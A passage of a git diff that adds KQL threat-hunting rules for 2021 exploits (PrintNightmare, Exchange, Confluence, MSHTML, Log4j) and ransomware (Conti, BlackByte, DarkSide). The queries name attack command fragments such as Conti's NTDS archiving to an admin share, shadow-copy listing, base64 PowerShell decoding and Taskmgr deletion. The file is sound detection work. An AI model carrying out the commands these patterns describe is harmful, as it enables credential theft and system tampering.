+| where InitiatingProcessFolderPath endswith "\\spoolsv.exe" and FolderPath contains "C:\\Windows\\System32\\spool\\drivers\\x64\\3\\"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2021/Exploits/CVE-2021-1675/printernightmare_mimikatz_driver_name.kql b/KQL/rules-emerging-threats/2021/Exploits/CVE-2021-1675/printernightmare_mimikatz_driver_name.kql
new file mode 100644
index 00000000..3bbdf80f
--- /dev/null
+++ b/KQL/rules-emerging-threats/2021/Exploits/CVE-2021-1675/printernightmare_mimikatz_driver_name.kql
@@ -0,0 +1,12 @@
+// Title: PrinterNightmare Mimikatz Driver Name
+// Author: Markus Neis, @markus_neis, Florian Roth
+// Date: 2021-07-04
+// Level: critical
+// Description: Detects static QMS 810 and mimikatz driver name used by Mimikatz as exploited in CVE-2021-1675 and CVE-2021-34527
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1204, cve.2021-1675, cve.2021-34527, detection.emerging-threats
+// False Positives:
+//   - Legitimate installation of printer driver QMS 810, Texas Instruments microLaser printer (unlikely)
+
+DeviceRegistryEvents
+| where (RegistryKey endswith "\\Control\\Print\\Environments\\Windows x64\\Drivers\\Version-3\\QMS 810*" or RegistryKey contains "\\Control\\Print\\Environments\\Windows x64\\Drivers\\Version-3\\mimikatz") or (RegistryKey contains "legitprinter" and RegistryKey contains "\\Control\\Print\\Environments\\Windows") or ((RegistryKey contains "\\Control\\Print\\Environments" or RegistryKey contains "\\CurrentVersion\\Print\\Printers") and (RegistryKey contains "Gentil Kiwi" or RegistryKey contains "mimikatz printer" or RegistryKey contains "Kiwi Legit Printer"))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2021/Exploits/CVE-2021-1675/windows_spooler_service_suspicious_binary_load.kql b/KQL/rules-emerging-threats/2021/Exploits/CVE-2021-1675/windows_spooler_service_suspicious_binary_load.kql
new file mode 100644
index 00000000..12d977c9
--- /dev/null
+++ b/KQL/rules-emerging-threats/2021/Exploits/CVE-2021-1675/windows_spooler_service_suspicious_binary_load.kql
@@ -0,0 +1,12 @@
+// Title: Windows Spooler Service Suspicious Binary Load
+// Author: FPT.EagleEye, Thomas Patzke (improvements)
+// Date: 2021-06-29
+// Level: informational
+// Description: Detect DLL Load from Spooler Service backup folder. This behavior has been observed during the exploitation of the Print Spooler Vulnerability CVE-2021-1675 and CVE-2021-34527 (PrinterNightmare).
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574, cve.2021-1675, cve.2021-34527, detection.emerging-threats
+// False Positives:
+//   - Loading of legitimate driver
+
+DeviceImageLoadEvents
+| where (FolderPath contains "\\Windows\\System32\\spool\\drivers\\x64\\3\\" or FolderPath contains "\\Windows\\System32\\spool\\drivers\\x64\\4\\") and FolderPath endswith ".dll" and InitiatingProcessFolderPath endswith "\\spoolsv.exe"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2021/Exploits/CVE-2021-26084/potential_atlassian_confluence_cve_2021_26084_exploitation_attempt.kql b/KQL/rules-emerging-threats/2021/Exploits/CVE-2021-26084/potential_atlassian_confluence_cve_2021_26084_exploitation_attempt.kql
new file mode 100644
index 00000000..774e5aa8
--- /dev/null
+++ b/KQL/rules-emerging-threats/2021/Exploits/CVE-2021-26084/potential_atlassian_confluence_cve_2021_26084_exploitation_attempt.kql
@@ -0,0 +1,10 @@
+// Title: Potential Atlassian Confluence CVE-2021-26084 Exploitation Attempt
+// Author: Bhabesh Raj
+// Date: 2021-09-08
+// Level: high
+// Description: Detects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2021-26084
+// MITRE Tactic: Initial Access
+// Tags: attack.initial-access, attack.execution, attack.t1190, attack.t1059, cve.2021-26084, detection.emerging-threats
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "certutil" or ProcessCommandLine contains "cmd /c" or ProcessCommandLine contains "cmd /k" or ProcessCommandLine contains "cscript" or ProcessCommandLine contains "curl" or ProcessCommandLine contains "ipconfig" or ProcessCommandLine contains "powershell" or ProcessCommandLine contains "pwsh" or ProcessCommandLine contains "regsvr32" or ProcessCommandLine contains "rundll32" or ProcessCommandLine contains "whoami" or ProcessCommandLine contains "wscript") and InitiatingProcessFolderPath endswith "\\Atlassian\\Confluence\\jre\\bin\\java.exe"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2021/Exploits/CVE-2021-26857/potential_cve_2021_26857_exploitation_attempt.kql b/KQL/rules-emerging-threats/2021/Exploits/CVE-2021-26857/potential_cve_2021_26857_exploitation_attempt.kql
new file mode 100644
index 00000000..fa15c274
--- /dev/null
+++ b/KQL/rules-emerging-threats/2021/Exploits/CVE-2021-26857/potential_cve_2021_26857_exploitation_attempt.kql
@@ -0,0 +1,10 @@
+// Title: Potential CVE-2021-26857 Exploitation Attempt
+// Author: Bhabesh Raj
+// Date: 2021-03-03
+// Level: high
+// Description: Detects possible successful exploitation for vulnerability described in CVE-2021-26857 by looking for | abnormal subprocesses spawning by Exchange Server's Unified Messaging service
+// MITRE Tactic: Execution
+// Tags: attack.t1203, attack.execution, cve.2021-26857, detection.emerging-threats
+
+DeviceProcessEvents
+| where InitiatingProcessFolderPath endswith "\\UMWorkerProcess.exe" and (not((FolderPath endswith "wermgr.exe" or FolderPath endswith "WerFault.exe")))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2021/Exploits/CVE-2021-26858/cve_2021_26858_exchange_exploitation.kql b/KQL/rules-emerging-threats/2021/Exploits/CVE-2021-26858/cve_2021_26858_exchange_exploitation.kql
new file mode 100644
index 00000000..21bdb334
--- /dev/null
+++ b/KQL/rules-emerging-threats/2021/Exploits/CVE-2021-26858/cve_2021_26858_exchange_exploitation.kql
@@ -0,0 +1,12 @@
+// Title: CVE-2021-26858 Exchange Exploitation
+// Author: Bhabesh Raj
+// Date: 2021-03-03
+// Level: high
+// Description: Detects possible successful exploitation for vulnerability described in CVE-2021-26858 by looking for
+// creation of non-standard files on disk by Exchange Server’s Unified Messaging service
+// which could indicate dropping web shells or other malicious content
+// MITRE Tactic: Execution
+// Tags: attack.t1203, attack.execution, cve.2021-26858, detection.emerging-threats
+
+DeviceFileEvents
+| where InitiatingProcessFolderPath endswith "UMWorkerProcess.exe" and (not((FolderPath endswith "CacheCleanup.bin" or FolderPath endswith ".txt" or FolderPath endswith ".LOG" or FolderPath endswith ".cfg" or FolderPath endswith "cleanup.bin")))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2021/Exploits/CVE-2021-33771/cve_2021_31979_cve_2021_33771_exploits.kql b/KQL/rules-emerging-threats/2021/Exploits/CVE-2021-33771/cve_2021_31979_cve_2021_33771_exploits.kql
new file mode 100644
index 00000000..f93775e5
--- /dev/null
+++ b/KQL/rules-emerging-threats/2021/Exploits/CVE-2021-33771/cve_2021_31979_cve_2021_33771_exploits.kql
@@ -0,0 +1,12 @@
+// Title: CVE-2021-31979 CVE-2021-33771 Exploits
+// Author: Sittikorn S, frack113
+// Date: 2021-07-16
+// Level: critical
+// Description: Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum
+// MITRE Tactic: Initial Access
+// Tags: attack.initial-access, attack.execution, attack.credential-access, attack.t1566, attack.t1203, cve.2021-33771, cve.2021-31979, detection.emerging-threats
+// False Positives:
+//   - Unlikely
+
+DeviceRegistryEvents
+| where (RegistryKey endswith "CLSID\\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\\InprocServer32\\(Default)" or RegistryKey endswith "CLSID\\{7C857801-7381-11CF-884D-00AA004B2E24}\\InProcServer32\\(Default)") and (not((RegistryValueData endswith "system32\\wbem\\wmiutils.dll" or RegistryValueData endswith "system32\\wbem\\wbemsvc.dll")))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2021/Exploits/CVE-2021-33771/cve_2021_31979_cve_2021_33771_exploits_by_sourgum.kql b/KQL/rules-emerging-threats/2021/Exploits/CVE-2021-33771/cve_2021_31979_cve_2021_33771_exploits_by_sourgum.kql
new file mode 100644
index 00000000..712cacbd
--- /dev/null
+++ b/KQL/rules-emerging-threats/2021/Exploits/CVE-2021-33771/cve_2021_31979_cve_2021_33771_exploits_by_sourgum.kql
@@ -0,0 +1,12 @@
+// Title: CVE-2021-31979 CVE-2021-33771 Exploits by Sourgum
+// Author: Sittikorn S
+// Date: 2021-07-16
+// Level: critical
+// Description: Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum
+// MITRE Tactic: Initial Access
+// Tags: attack.initial-access, attack.execution, attack.credential-access, attack.t1566, attack.t1203, cve.2021-33771, cve.2021-31979, detection.emerging-threats
+// False Positives:
+//   - Unlikely
+
+DeviceFileEvents
+| where FolderPath contains "C:\\Windows\\system32\\physmem.sys" or FolderPath contains "C:\\Windows\\System32\\IME\\IMEJP\\imjpueact.dll" or FolderPath contains "C:\\Windows\\system32\\ime\\IMETC\\IMTCPROT.DLL" or FolderPath contains "C:\\Windows\\system32\\ime\\SHARED\\imecpmeid.dll" or FolderPath contains "C:\\Windows\\system32\\config\\spp\\ServiceState\\Recovery\\pac.dat" or FolderPath contains "C:\\Windows\\system32\\config\\cy-GB\\Setup\\SKB\\InputMethod\\TupTask.dat" or FolderPath contains "C:\\Windows\\system32\\config\\config\\startwus.dat" or FolderPath contains "C:\\Windows\\system32\\ime\\SHARED\\WimBootConfigurations.ini" or FolderPath contains "C:\\Windows\\system32\\ime\\IMEJP\\WimBootConfigurations.ini" or FolderPath contains "C:\\Windows\\system32\\ime\\IMETC\\WimBootConfigurations.ini"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2021/Exploits/CVE-2021-35211/serv_u_exploitation_cve_2021_35211_by_dev_0322.kql b/KQL/rules-emerging-threats/2021/Exploits/CVE-2021-35211/serv_u_exploitation_cve_2021_35211_by_dev_0322.kql
new file mode 100644
index 00000000..11642822
--- /dev/null
+++ b/KQL/rules-emerging-threats/2021/Exploits/CVE-2021-35211/serv_u_exploitation_cve_2021_35211_by_dev_0322.kql
@@ -0,0 +1,12 @@
+// Title: Serv-U Exploitation CVE-2021-35211 by DEV-0322
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-07-14
+// Level: critical
+// Description: Detects patterns as noticed in exploitation of Serv-U CVE-2021-35211 vulnerability by threat group DEV-0322
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.t1136.001, cve.2021-35211, detection.emerging-threats
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "whoami" and ((ProcessCommandLine contains "./Client/Common/" or ProcessCommandLine contains ".\\Client\\Common\\") or ProcessCommandLine contains "C:\\Windows\\Temp\\Serv-U.bat")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2021/Exploits/CVE-2021-40444/potential_cve_2021_40444_exploitation_attempt.kql b/KQL/rules-emerging-threats/2021/Exploits/CVE-2021-40444/potential_cve_2021_40444_exploitation_attempt.kql
new file mode 100644
index 00000000..a6b66193
--- /dev/null
+++ b/KQL/rules-emerging-threats/2021/Exploits/CVE-2021-40444/potential_cve_2021_40444_exploitation_attempt.kql
@@ -0,0 +1,10 @@
+// Title: Potential CVE-2021-40444 Exploitation Attempt
+// Author: Florian Roth (Nextron Systems), @neonprimetime
+// Date: 2021-09-08
+// Level: high
+// Description: Detects potential exploitation of CVE-2021-40444 via suspicious process patterns seen in in-the-wild exploitations
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059, cve.2021-40444, detection.emerging-threats
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\control.exe" and (InitiatingProcessFolderPath endswith "\\winword.exe" or InitiatingProcessFolderPath endswith "\\powerpnt.exe" or InitiatingProcessFolderPath endswith "\\excel.exe")) and (not((ProcessCommandLine endswith "\\control.exe input.dll" or ProcessCommandLine endswith "\\control.exe\" input.dll")))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2021/Exploits/CVE-2021-40444/potential_exploitation_attempt_from_office_application.kql b/KQL/rules-emerging-threats/2021/Exploits/CVE-2021-40444/potential_exploitation_attempt_from_office_application.kql
new file mode 100644
index 00000000..a1bc3e71
--- /dev/null
+++ b/KQL/rules-emerging-threats/2021/Exploits/CVE-2021-40444/potential_exploitation_attempt_from_office_application.kql
@@ -0,0 +1,10 @@
+// Title: Potential Exploitation Attempt From Office Application
+// Author: Christian Burkard (Nextron Systems), @SBousseaden (idea)
+// Date: 2022-06-02
+// Level: high
+// Description: Detects Office applications executing a child process that includes directory traversal patterns. This could be an attempt to exploit CVE-2022-30190 (MSDT RCE) or CVE-2021-40444 (MSHTML RCE)
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.defense-evasion, cve.2021-40444, detection.emerging-threats
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "../../../.." or ProcessCommandLine contains "..\\..\\..\\.." or ProcessCommandLine contains "..//..//..//..") and (InitiatingProcessFolderPath endswith "\\winword.exe" or InitiatingProcessFolderPath endswith "\\excel.exe" or InitiatingProcessFolderPath endswith "\\powerpnt.exe" or InitiatingProcessFolderPath endswith "\\msaccess.exe" or InitiatingProcessFolderPath endswith "\\mspub.exe" or InitiatingProcessFolderPath endswith "\\eqnedt32.exe" or InitiatingProcessFolderPath endswith "\\visio.exe")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2021/Exploits/CVE-2021-40444/suspicious_word_cab_file_write_cve_2021_40444.kql b/KQL/rules-emerging-threats/2021/Exploits/CVE-2021-40444/suspicious_word_cab_file_write_cve_2021_40444.kql
new file mode 100644
index 00000000..18b31d5f
--- /dev/null
+++ b/KQL/rules-emerging-threats/2021/Exploits/CVE-2021-40444/suspicious_word_cab_file_write_cve_2021_40444.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Word Cab File Write CVE-2021-40444
+// Author: Florian Roth (Nextron Systems), Sittikorn S
+// Date: 2021-09-10
+// Level: high
+// Description: Detects file creation patterns noticeable during the exploitation of CVE-2021-40444
+// MITRE Tactic: Resource Development
+// Tags: attack.resource-development, attack.t1587, detection.emerging-threats
+
+DeviceFileEvents
+| where ((InitiatingProcessFolderPath endswith "\\winword.exe" and FolderPath contains "\\Windows\\INetCache" and FolderPath endswith ".cab") or (InitiatingProcessFolderPath endswith "\\winword.exe" and (FolderPath contains "\\AppData\\Local\\Temp\\" and FolderPath contains ".inf"))) and (not((FolderPath contains "AppData\\Local\\Temp" and FolderPath endswith "\\Content.inf" and FolderPath startswith "C:\\Users\\")))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2021/Exploits/CVE-2021-41379/installerfiletakeover_lpe_cve_2021_41379_file_create_event.kql b/KQL/rules-emerging-threats/2021/Exploits/CVE-2021-41379/installerfiletakeover_lpe_cve_2021_41379_file_create_event.kql
new file mode 100644
index 00000000..494481e5
--- /dev/null
+++ b/KQL/rules-emerging-threats/2021/Exploits/CVE-2021-41379/installerfiletakeover_lpe_cve_2021_41379_file_create_event.kql
@@ -0,0 +1,12 @@
+// Title: InstallerFileTakeOver LPE CVE-2021-41379 File Create Event
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-11-22
+// Level: critical
+// Description: Detects signs of the exploitation of LPE CVE-2021-41379 that include an msiexec process that creates an elevation_service.exe file
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.t1068, detection.emerging-threats
+// False Positives:
+//   - Possibly some Microsoft Edge upgrades
+
+DeviceFileEvents
+| where InitiatingProcessFolderPath endswith "\\msiexec.exe" and FolderPath endswith "\\elevation_service.exe" and FolderPath startswith "C:\\Program Files (x86)\\Microsoft\\Edge\\Application"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2021/Exploits/CVE-2021-41379/potential_cve_2021_41379_exploitation_attempt.kql b/KQL/rules-emerging-threats/2021/Exploits/CVE-2021-41379/potential_cve_2021_41379_exploitation_attempt.kql
new file mode 100644
index 00000000..f9fc009f
--- /dev/null
+++ b/KQL/rules-emerging-threats/2021/Exploits/CVE-2021-41379/potential_cve_2021_41379_exploitation_attempt.kql
@@ -0,0 +1,10 @@
+// Title: Potential CVE-2021-41379 Exploitation Attempt
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-11-22
+// Level: critical
+// Description: Detects potential exploitation attempts of CVE-2021-41379 (InstallerFileTakeOver), a local privilege escalation (LPE) vulnerability where the attacker spawns a "cmd.exe" process as a child of Microsoft Edge elevation service "elevation_service" with "LOCAL_SYSTEM" rights
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.t1068, cve.2021-41379, detection.emerging-threats
+
+DeviceProcessEvents
+| where ((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("Cmd.Exe", "PowerShell.EXE", "pwsh.dll"))) and ((ProcessIntegrityLevel in~ ("System", "S-1-16-16384")) and InitiatingProcessFolderPath endswith "\\elevation_service.exe")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2021/Exploits/CVE-2021-44077/cve_2021_44077_poc_default_dropped_file.kql b/KQL/rules-emerging-threats/2021/Exploits/CVE-2021-44077/cve_2021_44077_poc_default_dropped_file.kql
new file mode 100644
index 00000000..3fd6bd5a
--- /dev/null
+++ b/KQL/rules-emerging-threats/2021/Exploits/CVE-2021-44077/cve_2021_44077_poc_default_dropped_file.kql
@@ -0,0 +1,12 @@
+// Title: CVE-2021-44077 POC Default Dropped File
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-06-06
+// Level: high
+// Description: Detects the creation of "msiexec.exe" in the "bin" directory of the ManageEngine SupportCenter Plus (Related to CVE-2021-44077) and public POC available (See references section)
+// MITRE Tactic: Execution
+// Tags: attack.execution, cve.2021-44077, detection.emerging-threats
+// False Positives:
+//   - Unlikely
+
+DeviceFileEvents
+| where FolderPath endswith "\\ManageEngine\\SupportCenterPlus\\bin\\msiexec.exe"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2021/Exploits/CVE-2021-44228/potential_cve_2021_44228_exploitation_attempt_vmware_horizon.kql b/KQL/rules-emerging-threats/2021/Exploits/CVE-2021-44228/potential_cve_2021_44228_exploitation_attempt_vmware_horizon.kql
new file mode 100644
index 00000000..583e70d8
--- /dev/null
+++ b/KQL/rules-emerging-threats/2021/Exploits/CVE-2021-44228/potential_cve_2021_44228_exploitation_attempt_vmware_horizon.kql
@@ -0,0 +1,12 @@
+// Title: Potential CVE-2021-44228 Exploitation Attempt - VMware Horizon
+// Author: @kostastsale
+// Date: 2022-01-14
+// Level: high
+// Description: Detects potential initial exploitation attempts against VMware Horizon deployments running a vulnerable versions of Log4j.
+// MITRE Tactic: Initial Access
+// Tags: attack.initial-access, attack.t1190, cve.2021-44228, detection.emerging-threats
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where InitiatingProcessFolderPath endswith "\\ws_TomcatService.exe" and (not((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe")))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2021/Exploits/RazerInstaller-LPE-Exploit/suspicious_razerinstaller_explorer_subprocess.kql b/KQL/rules-emerging-threats/2021/Exploits/RazerInstaller-LPE-Exploit/suspicious_razerinstaller_explorer_subprocess.kql
new file mode 100644
index 00000000..84638fb0
--- /dev/null
+++ b/KQL/rules-emerging-threats/2021/Exploits/RazerInstaller-LPE-Exploit/suspicious_razerinstaller_explorer_subprocess.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious RazerInstaller Explorer Subprocess
+// Author: Florian Roth (Nextron Systems), Maxime Thiebaut
+// Date: 2021-08-23
+// Level: high
+// Description: Detects a explorer.exe sub process of the RazerInstaller software which can be invoked from the installer to select a different installation folder but can also be exploited to escalate privileges to LOCAL SYSTEM
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1553, detection.emerging-threats
+// False Positives:
+//   - User selecting a different installation folder (check for other sub processes of this explorer.exe process)
+
+DeviceProcessEvents
+| where ((ProcessIntegrityLevel in~ ("System", "S-1-16-16384")) and InitiatingProcessFolderPath endswith "\\RazerInstaller.exe") and (not(FolderPath startswith "C:\\Windows\\Installer\\Razer\\Installer\\"))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2021/Exploits/SystemNightmare-Exploit/potential_systemnightmare_exploitation_attempt.kql b/KQL/rules-emerging-threats/2021/Exploits/SystemNightmare-Exploit/potential_systemnightmare_exploitation_attempt.kql
new file mode 100644
index 00000000..34e1b597
--- /dev/null
+++ b/KQL/rules-emerging-threats/2021/Exploits/SystemNightmare-Exploit/potential_systemnightmare_exploitation_attempt.kql
@@ -0,0 +1,10 @@
+// Title: Potential SystemNightmare Exploitation Attempt
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-08-11
+// Level: critical
+// Description: Detects an exploitation attempt of SystemNightmare in order to obtain a shell as LOCAL_SYSTEM
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.t1068, detection.emerging-threats
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "printnightmare.gentilkiwi.com" or ProcessCommandLine contains " /user:gentilguest " or ProcessCommandLine contains "Kiwi Legit Printer"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2021/Malware/BlackByte/blackbyte_ransomware_registry.kql b/KQL/rules-emerging-threats/2021/Malware/BlackByte/blackbyte_ransomware_registry.kql
new file mode 100644
index 00000000..1e9363ef
--- /dev/null
+++ b/KQL/rules-emerging-threats/2021/Malware/BlackByte/blackbyte_ransomware_registry.kql
@@ -0,0 +1,12 @@
+// Title: Blackbyte Ransomware Registry
+// Author: frack113
+// Date: 2022-01-24
+// Level: high
+// Description: Detects specific windows registry modifications made by BlackByte ransomware variants.
+// BlackByte set three different registry values to escalate privileges and begin setting the stage for lateral movement and encryption.
+// This rule triggers when any of the following registry keys are set to DWORD 1, however all three should be investigated as part of a larger BlackByte ransomware detection and response effort.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112, detection.emerging-threats
+
+DeviceRegistryEvents
+| where RegistryValueData =~ "DWORD (0x00000001)" and (RegistryKey in~ ("HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\LocalAccountTokenFilterPolicy", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\EnableLinkedConnections", "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet001\\Control\\FileSystem\\LongPathsEnabled"))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2021/Malware/BlackByte/potential_blackbyte_ransomware_activity.kql b/KQL/rules-emerging-threats/2021/Malware/BlackByte/potential_blackbyte_ransomware_activity.kql
new file mode 100644
index 00000000..6d1167ef
--- /dev/null
+++ b/KQL/rules-emerging-threats/2021/Malware/BlackByte/potential_blackbyte_ransomware_activity.kql
@@ -0,0 +1,10 @@
+// Title: Potential BlackByte Ransomware Activity
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-02-25
+// Level: high
+// Description: Detects command line patterns used by BlackByte ransomware in different operations
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.defense-evasion, attack.impact, attack.t1485, attack.t1498, attack.t1059.001, attack.t1140, detection.emerging-threats
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " -single " and FolderPath startswith "C:\\Users\\Public\\") or (ProcessCommandLine contains "del C:\\Windows\\System32\\Taskmgr.exe" or ProcessCommandLine contains ";Set-Service -StartupType Disabled $" or ProcessCommandLine contains "powershell -command \"$x =[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String(" or ProcessCommandLine contains " do start wordpad.exe /p ")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2021/Malware/Conti/conti_ntds_exfiltration_command.kql b/KQL/rules-emerging-threats/2021/Malware/Conti/conti_ntds_exfiltration_command.kql
new file mode 100644
index 00000000..aab5306a
--- /dev/null
+++ b/KQL/rules-emerging-threats/2021/Malware/Conti/conti_ntds_exfiltration_command.kql
@@ -0,0 +1,10 @@
+// Title: Conti NTDS Exfiltration Command
+// Author: Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)
+// Date: 2021-08-09
+// Level: high
+// Description: Detects a command used by conti to exfiltrate NTDS
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.t1560, detection.emerging-threats
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "7za.exe" and ProcessCommandLine contains "\\C$\\temp\\log.zip"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2021/Malware/Conti/conti_volume_shadow_listing.kql b/KQL/rules-emerging-threats/2021/Malware/Conti/conti_volume_shadow_listing.kql
new file mode 100644
index 00000000..98a53527
--- /dev/null
+++ b/KQL/rules-emerging-threats/2021/Malware/Conti/conti_volume_shadow_listing.kql
@@ -0,0 +1,10 @@
+// Title: Conti Volume Shadow Listing
+// Author: Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)
+// Date: 2021-08-09
+// Level: high
+// Description: Detects a command used by conti to find volume shadow backups
+// MITRE Tactic: Resource Development
+// Tags: attack.t1587.001, attack.resource-development, detection.emerging-threats
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "vssadmin list shadows" and ProcessCommandLine contains "log.txt"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2021/Malware/Conti/potential_conti_ransomware_activity.kql b/KQL/rules-emerging-threats/2021/Malware/Conti/potential_conti_ransomware_activity.kql
new file mode 100644
index 00000000..773d6450
--- /dev/null
+++ b/KQL/rules-emerging-threats/2021/Malware/Conti/potential_conti_ransomware_activity.kql
@@ -0,0 +1,12 @@
+// Title: Potential Conti Ransomware Activity
+// Author: frack113
+// Date: 2021-10-12
+// Level: critical
+// Description: Detects a specific command used by the Conti ransomware group
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.s0575, attack.t1486, detection.emerging-threats
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "-m " and ProcessCommandLine contains "-net " and ProcessCommandLine contains "-size " and ProcessCommandLine contains "-nomutex " and ProcessCommandLine contains "-p \\\\" and ProcessCommandLine contains "$"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2021/Malware/Conti/potential_conti_ransomware_database_dumping_activity_via_sqlcmd.kql b/KQL/rules-emerging-threats/2021/Malware/Conti/potential_conti_ransomware_database_dumping_activity_via_sqlcmd.kql
new file mode 100644
index 00000000..b2296125
--- /dev/null
+++ b/KQL/rules-emerging-threats/2021/Malware/Conti/potential_conti_ransomware_database_dumping_activity_via_sqlcmd.kql
@@ -0,0 +1,10 @@
+// Title: Potential Conti Ransomware Database Dumping Activity Via SQLCmd
+// Author: frack113
+// Date: 2021-08-16
+// Level: high
+// Description: Detects a command used by conti to dump database
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.t1005, detection.emerging-threats
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "sys.sysprocesses" or ProcessCommandLine contains "master.dbo.sysdatabases" or ProcessCommandLine contains "BACKUP DATABASE") and ProcessCommandLine contains " -S localhost " and (FolderPath endswith "\\sqlcmd.exe" or (ProcessCommandLine contains "sqlcmd " or ProcessCommandLine contains "sqlcmd.exe"))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2021/Malware/DarkSide/darkside_ransomware_pattern.kql b/KQL/rules-emerging-threats/2021/Malware/DarkSide/darkside_ransomware_pattern.kql
new file mode 100644
index 00000000..8096e68e
--- /dev/null
+++ b/KQL/rules-emerging-threats/2021/Malware/DarkSide/darkside_ransomware_pattern.kql
@@ -0,0 +1,12 @@
+// Title: DarkSide Ransomware Pattern
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-05-14
+// Level: critical
+// Description: Detects DarkSide Ransomware and helpers
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1204, detection.emerging-threats
+// False Positives:
+//   - UAC bypass method used by other malware
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "=[char][byte]('0x'+" or ProcessCommandLine contains " -work worker0 -path ") or (FolderPath contains "\\AppData\\Local\\Temp\\" and InitiatingProcessCommandLine contains "DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2021/Malware/Devil-Bait/potential_devil_bait_malware_reconnaissance.kql b/KQL/rules-emerging-threats/2021/Malware/Devil-Bait/potential_devil_bait_malware_reconnaissance.kql
new file mode 100644
index 00000000..3b1c17b9
--- /dev/null
+++ b/KQL/rules-emerging-threats/2021/Malware/Devil-Bait/potential_devil_bait_malware_reconnaissance.kql
@@ -0,0 +1,12 @@
+// Title: Potential Devil Bait Malware Reconnaissance
+// Author: Nasreddine Bencherchali (Nextron Systems), NCSC (Idea)
+// Date: 2023-05-15
+// Level: high
+// Description: Detects specific process behavior observed with Devil Bait samples
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218, detection.emerging-threats
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine matches regex "ipconfig\\s+/all" or (ProcessCommandLine contains "dir" or ProcessCommandLine contains "systeminfo" or ProcessCommandLine contains "tasklist")) and (ProcessCommandLine contains ">>%APPDATA%\\Microsoft\\" and (ProcessCommandLine endswith ".xml" or ProcessCommandLine endswith ".txt") and FolderPath endswith "\\cmd.exe" and InitiatingProcessFolderPath endswith "\\wscript.exe")
\ No newline at end of file
